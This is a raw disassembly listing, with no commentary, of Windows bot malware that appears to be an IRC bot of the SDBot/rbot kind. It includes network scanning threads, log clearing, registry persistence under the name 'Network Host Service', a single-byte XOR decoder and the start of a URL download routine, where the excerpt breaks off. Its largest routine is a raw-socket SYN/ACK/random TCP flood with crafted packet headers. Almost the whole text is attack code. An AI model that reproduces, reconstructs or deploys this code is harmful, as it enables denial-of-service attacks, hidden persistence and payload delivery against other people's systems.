lea ebp, [esp-74h]
sub esp, 250h
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 74h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_250]
rep movsd
mov dword ptr [eax+1C8h], 1
lea eax, [ebp+74h+var_250]
push eax
call dword_43585C ; inet_addr
mov ecx, [ebp+74h+var_AC]
sub esp, 1D0h
mov dword_42E620[ecx*8], eax
push 74h
pop ecx
lea esi, [ebp+74h+var_250]
mov edi, esp
rep movsd
call sub_401141
xor ebx, ebx
add esp, 1D0h
cmp [ebp+74h+var_1C0], ebx
jnz short loc_401C0F
mov eax, dword_43533C
mov [ebp+74h+var_1C0], eax
loc_401C0F: ; CODE XREF: sub_401B9D+65�j
push 9
call sub_412661
xor edi, edi
inc edi
cmp eax, edi
pop ecx
jnz short loc_401C7F
mov esi, offset dword_42F5C0
push esi
call ds:dword_420024 ; RtlDeleteCriticalSection
push 80000400h
push esi
call ds:dword_420020 ; InitializeCriticalSectionAndSpinCount
test eax, eax
jnz short loc_401C7F
lea eax, [ebp+74h+var_80]
push offset aScanFailedToIn ; "[SCAN]: Failed to initialize critical s"...
push eax
call sub_4145E5
cmp [ebp+74h+var_90], ebx
pop ecx
pop ecx
jnz short loc_401C69
push ebx
push [ebp+74h+var_94]
lea eax, [ebp+74h+var_80]
push eax
lea eax, [ebp+74h+var_1BC]
push eax
push [ebp+74h+var_BC]
call sub_4056FB
add esp, 14h
loc_401C69: ; CODE XREF: sub_401B9D+B0�j
lea eax, [ebp+74h+var_80]
push eax
call sub_401EFF
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
add ebp, 74h
leave
retn 4
; ---------------------------------------------------------------------------
loc_401C7F: ; CODE XREF: sub_401B9D+7F�j
; sub_401B9D+9B�j
cmp [ebp+74h+var_A0], edi
mov eax, [ebp+74h+var_AC]
mov esi, ds:dword_420000
mov dword_42E624[eax*8], edi
jb loc_401D30
loc_401C98: ; CODE XREF: sub_401B9D+18D�j
push edi
push [ebp+74h+var_AC]
lea eax, [ebp+74h+var_250]
push [ebp+74h+var_B8]
mov [ebp+74h+var_A4], edi
push eax
lea eax, [ebp+74h+var_80]
push offset aScanSDScanThre ; "[SCAN]: %s:%d, Scan thread: %d, Sub-thr"...
push eax
call sub_4145E5
push ebx
lea eax, [ebp+74h+var_80]
push 9
push eax
call sub_412471
mov ecx, [ebp+74h+var_AC]
mov [ebp+74h+var_A8], eax
imul eax, 234h
add esp, 24h
push ebx
push ebx
mov dword_436684[eax], ecx
lea eax, [ebp+74h+var_250]
push eax
push offset sub_401967
push ebx
push ebx
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+74h+var_A8]
imul ecx, 234h
cmp eax, ebx
mov dword_436694[ecx], eax
jnz short loc_401D47
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+74h+var_80]
push offset aScanFailedToSt ; "[SCAN]: Failed to start worker thread, "...
push eax
call sub_4145E5
lea eax, [ebp+74h+var_80]
push eax
call sub_401EFF
add esp, 10h
loc_401D22: ; CODE XREF: sub_401B9D+1AF�j
push 1Eh
call esi ; Sleep
inc edi
cmp edi, [ebp+74h+var_A0]
jbe loc_401C98
loc_401D30: ; CODE XREF: sub_401B9D+F5�j
cmp [ebp+74h+var_B0], ebx
jz short loc_401D55
mov eax, [ebp+74h+var_B0]
imul eax, 0EA60h
push eax
call esi ; Sleep
jmp short loc_401D62
; ---------------------------------------------------------------------------
loc_401D43: ; CODE XREF: sub_401B9D+1AD�j
push 1Eh
call esi ; Sleep
loc_401D47: ; CODE XREF: sub_401B9D+162�j
cmp [ebp+74h+var_84], ebx
jz short loc_401D43
jmp short loc_401D22
; ---------------------------------------------------------------------------
loc_401D4E: ; CODE XREF: sub_401B9D+1C3�j
push 7D0h
call esi ; Sleep
loc_401D55: ; CODE XREF: sub_401B9D+196�j
mov eax, [ebp+74h+var_AC]
cmp dword_42E624[eax*8], 1
jz short loc_401D4E
loc_401D62: ; CODE XREF: sub_401B9D+1A4�j
push [ebp+74h+var_B0]
mov eax, [ebp+74h+var_AC]
push [ebp+74h+var_B8]
mov eax, dword_42E620[eax*8]
push eax
call dword_435868 ; inet_ntoa
push eax
lea eax, [ebp+74h+var_80]
push offset aScanFinishedAt ; "[SCAN]: Finished at %s:%d after %d minu"...
push eax
call sub_4145E5
add esp, 14h
cmp [ebp+74h+var_90], ebx
jnz short loc_401DAA
push ebx
push [ebp+74h+var_94]
lea eax, [ebp+74h+var_80]
push eax
lea eax, [ebp+74h+var_1BC]
push eax
push [ebp+74h+var_BC]
call sub_4056FB
add esp, 14h
loc_401DAA: ; CODE XREF: sub_401B9D+1F1�j
lea eax, [ebp+74h+var_80]
push eax
call sub_401EFF
mov eax, [ebp+74h+var_AC]
mov dword_42E624[eax*8], ebx
mov [esp+290h+var_304], 0BB8h
call esi ; Sleep
push 9
call sub_412661
cmp eax, 1
pop ecx
jnz short loc_401DDE
push offset dword_42F5C0
call ds:dword_420024 ; RtlDeleteCriticalSection
loc_401DDE: ; CODE XREF: sub_401B9D+234�j
push [ebp+74h+var_AC]
call sub_412735
pop ecx
push ebx
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_401B9D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401DEF proc near ; CODE XREF: sub_408A18+367B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
xor ebx, ebx
mov edi, offset dword_47B378
loc_401DF9: ; CODE XREF: sub_401DEF+4D�j
cmp byte ptr [edi], 0
jz short loc_401E40
mov esi, [esp+0Ch+arg_0]
mov eax, edi
loc_401E04: ; CODE XREF: sub_401DEF+31�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_401E26
test cl, cl
jz short loc_401E22
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_401E26
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_401E04
loc_401E22: ; CODE XREF: sub_401DEF+1F�j
xor eax, eax
jmp short loc_401E2B
; ---------------------------------------------------------------------------
loc_401E26: ; CODE XREF: sub_401DEF+1B�j
; sub_401DEF+29�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_401E2B: ; CODE XREF: sub_401DEF+35�j
test eax, eax
jz short loc_401E40
add edi, 0B8h
inc ebx
cmp edi, offset dword_47BEF8
jl short loc_401DF9
jmp short loc_401E81
; ---------------------------------------------------------------------------
loc_401E40: ; CODE XREF: sub_401DEF+D�j
; sub_401DEF+3E�j
mov esi, ebx
imul esi, 0B8h
push 2Eh
pop ecx
push 17h
push [esp+10h+arg_0]
lea edx, dword_47B378[esi]
xor eax, eax
mov edi, edx
push edx
rep stosd
call sub_414670
push 9Fh
push [esp+1Ch+arg_4]
lea eax, dword_47B390[esi]
push eax
call sub_414670
add esp, 18h
inc dword_42C2F8
loc_401E81: ; CODE XREF: sub_401DEF+4F�j
pop edi
pop esi
mov eax, ebx
pop ebx
retn
sub_401DEF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E87 proc near ; CODE XREF: sub_408A18+4A8A�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push [ebp+arg_8]
push offset aAliasList ; "-[Alias List]-"
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056FB
add esp, 14h
xor edi, edi
mov esi, offset dword_47B378
loc_401EB1: ; CODE XREF: sub_401E87+72�j
cmp byte ptr [esi], 0
jz short loc_401EEC
lea eax, [esi+18h]
push eax
push esi
push edi
push offset aD_SS ; "%d. %s = %s"
lea eax, [ebp+var_200]
push 200h
push eax
call sub_41483D
push 1
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056FB
add esp, 2Ch
loc_401EEC: ; CODE XREF: sub_401E87+2D�j
add esi, 0B8h
inc edi
cmp esi, offset dword_47BEF8
jl short loc_401EB1
pop edi
pop esi
leave
retn
sub_401E87 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401EFF proc near ; CODE XREF: sub_401000+BE�p
; sub_4010CA+6D�p ...
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
lea eax, [ebp+var_10]
push eax
call ds:dword_420028 ; GetLocalTime
mov ebx, offset dword_433ED8
mov edi, 80h
mov esi, offset dword_42FED8
loc_401F21: ; CODE XREF: sub_401EFF+3D�j
cmp byte ptr [ebx], 0
jz short loc_401F38
push 7Fh
lea eax, [ebx+80h]
push ebx
push eax
call sub_414670
add esp, 0Ch
loc_401F38: ; CODE XREF: sub_401EFF+25�j
sub ebx, edi
cmp ebx, esi
jge short loc_401F21
push [ebp+arg_0]
movzx eax, [ebp+var_4]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset a_2d_2d4d_2d_2d ; "[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
push edi
push esi
call sub_41483D
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_401EFF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401F73 proc near ; CODE XREF: sub_4088B9+A4�p
; sub_408A18:loc_40BDE3�p ...
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 80h
lea eax, [ebp+arg_4]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_80]
push 80h
push eax
call sub_414894
lea eax, [ebp+var_80]
push eax
call sub_401EFF
add esp, 14h
leave
retn
sub_401F73 endp
; =============== S U B R O U T I N E =======================================
sub_401F9F proc near ; CODE XREF: sub_408A18+497E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, offset dword_42FED8
xor ecx, ecx
loc_401FA6: ; CODE XREF: sub_401F9F+13�j
mov [eax], cl
add eax, 80h
cmp eax, offset dword_433ED8
jl short loc_401FA6
cmp [esp+arg_C], ecx
push esi
mov esi, offset aLogsCleared_ ; "[LOGS]: Cleared."
jnz short loc_401FD6
push ecx
push [esp+8+arg_8]
push esi
push [esp+10h+arg_4]
push [esp+14h+arg_0]
call sub_4056FB
add esp, 14h
loc_401FD6: ; CODE XREF: sub_401F9F+1F�j
push esi
call sub_401EFF
pop ecx
pop esi
retn
sub_401F9F endp
; =============== S U B R O U T I N E =======================================
sub_401FDF proc near ; CODE XREF: .text:00413EF4�p
arg_0 = dword ptr 4
push esi
mov esi, offset dword_42FED8
loc_401FE5: ; CODE XREF: sub_401FDF+27�j
cmp byte ptr [esi], 0
jz short loc_401FFA
push [esp+4+arg_0]
push esi
call sub_406BF3
test eax, eax
pop ecx
pop ecx
jnz short loc_40200C
loc_401FFA: ; CODE XREF: sub_401FDF+9�j
add esi, 80h
cmp esi, offset dword_433ED8
jl short loc_401FE5
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40200C: ; CODE XREF: sub_401FDF+19�j
xor eax, eax
inc eax
pop esi
retn
sub_401FDF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402011 proc near ; DATA XREF: sub_408A18+4A35�o
var_31C = byte ptr -31Ch
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 31Ch
mov eax, [ebp+arg_0]
push esi
push edi
push 45h
pop ecx
mov esi, eax
lea edi, [ebp+var_11C]
rep movsd
xor edi, edi
xor edx, edx
inc edi
cmp [ebp+var_10], edx
mov [ebp+var_8], 80h
mov [ebp+var_4], edx
mov [eax+110h], edi
jnz short loc_402064
push edx
push [ebp+var_14]
lea eax, [ebp+var_118]
push offset aLogBegin ; "[LOG]: Begin"
push eax
push [ebp+var_11C]
call sub_4056FB
add esp, 14h
loc_402064: ; CODE XREF: sub_402011+33�j
cmp [ebp+var_98], 0
jz short loc_402084
lea eax, [ebp+var_98]
push eax
call sub_414972
test eax, eax
pop ecx
mov [ebp+var_4], eax
jz short loc_402084
mov [ebp+var_8], eax
loc_402084: ; CODE XREF: sub_402011+5A�j
; sub_402011+6E�j
and [ebp+arg_0], 0
mov esi, offset dword_42FED8
loc_40208D: ; CODE XREF: sub_402011+D4�j
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_8]
jge short loc_4020E7
cmp byte ptr [esi], 0
jz short loc_4020D6
cmp [ebp+var_98], 0
jz short loc_4020BC
cmp [ebp+var_4], 0
jnz short loc_4020BC
lea eax, [ebp+var_98]
push eax
push esi
call sub_406BF3
test eax, eax
pop ecx
pop ecx
jz short loc_4020D6
loc_4020BC: ; CODE XREF: sub_402011+90�j
; sub_402011+96�j
push edi
push [ebp+var_14]
lea eax, [ebp+var_118]
push esi
push eax
push [ebp+var_11C]
call sub_4056FB
add esp, 14h
loc_4020D6: ; CODE XREF: sub_402011+87�j
; sub_402011+A9�j
inc [ebp+arg_0]
add esi, 80h
cmp esi, offset dword_433ED8
jl short loc_40208D
loc_4020E7: ; CODE XREF: sub_402011+82�j
lea eax, [ebp+var_31C]
push offset aLogListComplet ; "[LOG]: List complete."
push eax
call sub_4145E5
xor esi, esi
cmp [ebp+var_10], esi
pop ecx
pop ecx
jnz short loc_402121
push esi
push [ebp+var_14]
lea eax, [ebp+var_31C]
push eax
lea eax, [ebp+var_118]
push eax
push [ebp+var_11C]
call sub_4056FB
add esp, 14h
loc_402121: ; CODE XREF: sub_402011+EE�j
lea eax, [ebp+var_31C]
push eax
call sub_401EFF
push [ebp+var_18]
call sub_412735
pop ecx
pop ecx
push esi
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_402011 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40213F proc near ; CODE XREF: sub_406A33+1E�p
; sub_40E745+34A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, offset aNetworkHostSer ; "Network Host Service"
loc_40214F: ; CODE XREF: sub_40213F+6F�j
push ebx
lea eax, [ebp+var_4]
push eax
push ebx
push 0F003Fh
push ebx
push ebx
push ebx
push off_42B3CC[edi]
push dword_42B3C8[edi]
call dword_435830 ; RegCreateKeyExA
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_402195
lea edx, [eax+1]
loc_402179: ; CODE XREF: sub_40213F+3F�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_402179
sub eax, edx
push eax
push [ebp+arg_0]
push 1
push ebx
push esi
push [ebp+var_4]
call dword_4357CC ; RegSetValueExA
jmp short loc_40219F
; ---------------------------------------------------------------------------
loc_402195: ; CODE XREF: sub_40213F+35�j
push esi
push [ebp+var_4]
call dword_435824 ; RegDeleteValueA
loc_40219F: ; CODE XREF: sub_40213F+54�j
push [ebp+var_4]
call dword_4358C4 ; RegCloseKey
add edi, 8
cmp edi, 18h
jb short loc_40214F
pop edi
pop esi
pop ebx
leave
retn
sub_40213F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=64h
sub_4021B5 proc near ; CODE XREF: sub_4024E0+40�p
var_288 = byte ptr -288h
var_F8 = byte ptr -0F8h
var_B8 = byte ptr -0B8h
var_B7 = byte ptr -0B7h
var_A4 = byte ptr -0A4h
var_98 = byte ptr -98h
var_90 = byte ptr -90h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = byte ptr -74h
var_73 = byte ptr -73h
var_72 = word ptr -72h
var_5C = word ptr -5Ch
var_5A = word ptr -5Ah
var_58 = dword ptr -58h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_36 = word ptr -36h
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = byte ptr -30h
var_2F = byte ptr -2Fh
var_2E = word ptr -2Eh
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
lea ebp, [esp-64h]
sub esp, 288h
and [ebp+64h+var_B8], 0
push edi
push 0Eh
pop ecx
xor eax, eax
lea edi, [ebp+64h+var_B7]
rep stosd
stosw
stosb
lea eax, [ebp+64h+var_288]
push eax
push 202h
call dword_4357F8 ; WSAStartup
test eax, eax
jz short loc_4021EF
xor eax, eax
jmp loc_4024B1
; ---------------------------------------------------------------------------
loc_4021EF: ; CODE XREF: sub_4021B5+31�j
push esi
xor esi, esi
inc esi
push esi
xor edi, edi
push edi
push edi
push 0FFh
push 3
push 2
call dword_43576C ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+64h+var_24], eax
jz loc_4024A8
push 4
lea ecx, [ebp+64h+var_44]
push ecx
push 2
push edi
push eax
mov [ebp+64h+var_44], esi
call dword_435804 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_40249F
push ebx
push [ebp+64h+arg_C]
mov [ebp+64h+var_5C], 2
call dword_435934 ; ntohs
mov ebx, [ebp+64h+arg_0]
push 28h
mov [ebp+64h+var_5A], ax
mov [ebp+64h+var_58], ebx
mov [ebp+64h+var_38], 45h
call dword_435934 ; ntohs
push [ebp+64h+arg_C]
mov [ebp+64h+var_36], ax
mov [ebp+64h+var_34], si
mov [ebp+64h+var_32], di
mov [ebp+64h+var_30], 80h
mov [ebp+64h+var_2F], 6
mov [ebp+64h+var_2E], di
mov [ebp+64h+var_28], ebx
call dword_435934 ; ntohs
mov [ebp+64h+var_16], ax
call sub_4147A1
movzx eax, ax
cdq
mov ecx, 401h
idiv ecx
push edx
call dword_435934 ; ntohs
push 12345678h
call dword_43590C ; ntohl
mov esi, [ebp+64h+arg_8]
push 9
mov edi, offset aDdos_syn ; "ddos.syn"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_4022B9
and [ebp+64h+var_10], eax
mov [ebp+64h+var_B], 2
jmp short loc_402309
; ---------------------------------------------------------------------------
loc_4022B9: ; CODE XREF: sub_4021B5+F9�j
mov esi, [ebp+64h+arg_8]
push 9
mov edi, offset aDdos_ack ; "ddos.ack"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_4022D3
and [ebp+64h+var_10], eax
mov [ebp+64h+var_B], 10h
jmp short loc_402309
; ---------------------------------------------------------------------------
loc_4022D3: ; CODE XREF: sub_4021B5+113�j
mov esi, [ebp+64h+arg_8]
push 0Ch
mov edi, offset aDdos_random ; "ddos.random"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_402309
call sub_4147A1
cdq
push 3
pop ecx
idiv ecx
mov [ebp+64h+var_10], edx
call sub_4147A1
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+64h+var_B], dl
loc_402309: ; CODE XREF: sub_4021B5+102�j
; sub_4021B5+11C�j ...
push 4000h
mov [ebp+64h+var_C], 50h
call dword_435934 ; ntohs
and [ebp+64h+var_6], 0
and [ebp+64h+var_4], 0
mov [ebp+64h+var_A], ax
lea eax, [ebp+64h+var_4C]
push eax
call ds:dword_420030 ; QueryPerformanceFrequency
lea eax, [ebp+64h+var_20]
push eax
call ds:dword_42002C ; QueryPerformanceCounter
push [ebp+64h+var_48]
mov eax, [ebp+64h+arg_10]
push [ebp+64h+var_4C]
cdq
push edx
push eax
call sub_414E90
add eax, [ebp+64h+var_20]
adc edx, [ebp+64h+var_1C]
mov [ebp+64h+var_40], eax
mov [ebp+64h+var_3C], edx
loc_402356: ; CODE XREF: sub_4021B5+2D4�j
; sub_4021B5+2E0�j
and [ebp+64h+var_8], 0
call sub_4147A1
push 2
cdq
pop ecx
idiv ecx
test edx, edx
jz short loc_402380
call sub_4147A1
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
jmp short loc_402382
; ---------------------------------------------------------------------------
loc_402380: ; CODE XREF: sub_4021B5+1B3�j
push 50h
loc_402382: ; CODE XREF: sub_4021B5+1C9�j
call dword_435934 ; ntohs
mov [ebp+64h+var_18], ax
call sub_4147A1
call sub_4147A1
push eax
call dword_435934 ; ntohs
push [ebp+64h+arg_4]
movzx eax, ax
mov [ebp+64h+var_14], eax
call dword_43590C ; ntohl
inc [ebp+64h+arg_4]
cmp word ptr [ebp+64h+arg_C], 0
mov esi, eax
mov [ebp+64h+var_2C], esi
jnz short loc_4023DF
call sub_4147A1
mov edi, eax
call sub_4147A1
add edi, eax
movzx eax, di
cdq
mov ecx, 0EA60h
idiv ecx
push edx
call dword_435934 ; ntohs
mov [ebp+64h+var_16], ax
loc_4023DF: ; CODE XREF: sub_4021B5+204�j
and [ebp+64h+var_74], 0
push 14h
mov [ebp+64h+var_78], ebx
mov [ebp+64h+var_73], 6
call dword_435934 ; ntohs
push 8
pop ecx
mov [ebp+64h+var_7C], esi
mov [ebp+64h+var_72], ax
push 5
lea esi, [ebp+64h+var_7C]
lea edi, [ebp+64h+var_B8]
rep movsd
pop ecx
lea eax, [ebp+64h+var_B8]
push 34h
lea esi, [ebp+64h+var_18]
lea edi, [ebp+64h+var_98]
push eax
rep movsd
call sub_407DA7
push 5
pop ecx
push 5
lea esi, [ebp+64h+var_38]
lea edi, [ebp+64h+var_B8]
rep movsd
mov [ebp+64h+var_8], ax
pop ecx
lea esi, [ebp+64h+var_18]
lea edi, [ebp+64h+var_A4]
rep movsd
xor eax, eax
lea edi, [ebp+64h+var_90]
stosd
lea eax, [ebp+64h+var_B8]
push 28h
push eax
call sub_407DA7
add esp, 10h
push 5
pop ecx
push 10h
mov [ebp+64h+var_2E], ax
lea esi, [ebp+64h+var_38]
lea edi, [ebp+64h+var_B8]
lea eax, [ebp+64h+var_5C]
push eax
rep movsd
xor edi, edi
push edi
push 28h
lea eax, [ebp+64h+var_B8]
push eax
push [ebp+64h+var_24]
call dword_4357B8 ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_4024B7
add [ebp+64h+var_4], eax
lea eax, [ebp+64h+var_20]
push eax
call ds:dword_42002C ; QueryPerformanceCounter
mov eax, [ebp+64h+var_1C]
cmp eax, [ebp+64h+var_3C]
jg short loc_40249B
jl loc_402356
mov eax, [ebp+64h+var_20]
cmp eax, [ebp+64h+var_40]
jb loc_402356
loc_40249B: ; CODE XREF: sub_4021B5+2D2�j
mov edi, [ebp+64h+var_4]
loc_40249E: ; CODE XREF: sub_4021B5+329�j
pop ebx
loc_40249F: ; CODE XREF: sub_4021B5+74�j
push [ebp+64h+var_24]
call dword_4358F4 ; closesocket
loc_4024A8: ; CODE XREF: sub_4021B5+58�j
call dword_435900 ; WSACleanup
mov eax, edi
pop esi
loc_4024B1: ; CODE XREF: sub_4021B5+35�j
pop edi
add ebp, 64h
leave
retn
; ---------------------------------------------------------------------------
loc_4024B7: ; CODE XREF: sub_4021B5+2BD�j
call dword_4358A0 ; WSAGetLastError
push eax
lea eax, [ebp+64h+var_F8]
push offset aDdosSendErrorD ; "[DDoS]: Send error: <%d>."
push eax
call sub_4145E5
lea eax, [ebp+64h+var_F8]
push eax
call sub_401EFF
add esp, 10h
jmp short loc_40249E
sub_4021B5 endp
; =============== S U B R O U T I N E =======================================
sub_4024E0 proc near ; CODE XREF: sub_40253C+4F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_407C3B
push [esp+10h+arg_4]
mov esi, eax
call sub_414972
push [esp+14h+arg_C]
mov ebx, eax
call sub_414972
mov edi, eax
call sub_4147A1
cdq
mov ecx, 200h
idiv ecx
push edi
push ebx
push [esp+20h+arg_8]
lea eax, [edx+esi+100h]
push eax
push esi
call sub_4021B5
add esp, 20h
test eax, eax
jnz short loc_40252D
inc eax
loc_40252D: ; CODE XREF: sub_4024E0+4A�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_4024E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40253C proc near ; DATA XREF: sub_408A18+2B05�o
var_494 = byte ptr -494h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = byte ptr -28Ch
var_20C = byte ptr -20Ch
var_18C = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_8C = byte ptr -8Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 494h
mov eax, [ebp+arg_0]
push esi
push edi
mov esi, eax
mov ecx, 0A5h
lea edi, [ebp+var_294]
rep movsd
mov dword ptr [eax+290h], 1
call ds:dword_420004 ; GetTickCount
push eax
call sub_414794
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_20C]
push eax
lea eax, [ebp+var_28C]
push eax
call sub_4024E0
push eax
lea eax, [ebp+var_494]
push offset aDdosDoneWithFl ; "[DDoS]: Done with flood (%iKB/sec)."
push eax
call sub_4145E5
xor esi, esi
add esp, 20h
cmp [ebp+var_8], esi
jnz short loc_4025CC
push esi
push [ebp+var_C]
lea eax, [ebp+var_494]
push eax
lea eax, [ebp+var_10C]
push eax
push [ebp+var_294]
call sub_4056FB
add esp, 14h
loc_4025CC: ; CODE XREF: sub_40253C+6E�j
lea eax, [ebp+var_494]
push eax
call sub_401EFF
push [ebp+var_290]
call sub_412735
pop ecx
pop ecx
push esi
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_40253C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4025ED proc near ; CODE XREF: sub_40260A+109�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
xor ecx, ecx
cmp [esp+arg_4], ecx
jle short locret_402609
loc_4025F9: ; CODE XREF: sub_4025ED+1A�j
mov dl, byte_42BED0
xor [ecx+eax], dl
inc ecx
cmp ecx, [esp+arg_4]
jl short loc_4025F9
locret_402609: ; CODE XREF: sub_4025ED+A�j
retn
sub_4025ED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40260A proc near ; DATA XREF: sub_408A18+28F5�o
; sub_408A18+30EE�o
var_88C = qword ptr -88Ch
var_880 = qword ptr -880h
var_810 = byte ptr -810h
var_610 = byte ptr -610h
var_410 = dword ptr -410h
var_40C = byte ptr -40Ch
var_38C = byte ptr -38Ch
var_28C = byte ptr -28Ch
var_18C = byte ptr -18Ch
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_68 = dword ptr -68h
var_5C = dword ptr -5Ch
var_3C = dword ptr -3Ch
var_38 = word ptr -38h
var_24 = byte ptr -24h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 810h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
xor ebx, ebx
push ebx
mov esi, eax
mov ecx, 0EAh
lea edi, [ebp+var_410]
rep movsd
push ebx
xor esi, esi
push ebx
inc esi
mov [eax+3A4h], esi
push ebx
lea eax, [ebp+var_38C]
push eax
push dword_435928
call dword_4357F0 ; InternetOpenUrlA
cmp eax, ebx
mov [ebp+var_C], eax
jz loc_402AB9
push ebx
push ebx
push 2
push ebx
push ebx
push 40000000h
lea eax, [ebp+var_28C]
push eax
call ds:dword_420044 ; CreateFileA
cmp eax, esi
mov [ebp+var_10], eax
jnb short loc_4026D1
lea eax, [ebp+var_28C]
push eax
lea eax, [ebp+var_610]
push offset aDownloadCouldn ; "[DOWNLOAD]: Couldn't open file: %s."
push eax
call sub_4145E5
add esp, 0Ch
cmp [ebp+var_74], ebx
jnz short loc_4026B4
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_4056FB
add esp, 14h
loc_4026B4: ; CODE XREF: sub_40260A+88�j
lea eax, [ebp+var_610]
push eax
call sub_401EFF
push [ebp+var_8C]
call sub_412735
pop ecx
jmp loc_402B1A
; ---------------------------------------------------------------------------
loc_4026D1: ; CODE XREF: sub_40260A+68�j
xor esi, esi
call ds:dword_420004 ; GetTickCount
mov [ebp+var_4], eax
loc_4026DC: ; CODE XREF: sub_40260A+174�j
xor eax, eax
mov ecx, 80h
lea edi, [ebp+var_610]
rep stosd
lea eax, [ebp+arg_0]
push eax
push 200h
lea eax, [ebp+var_610]
push eax
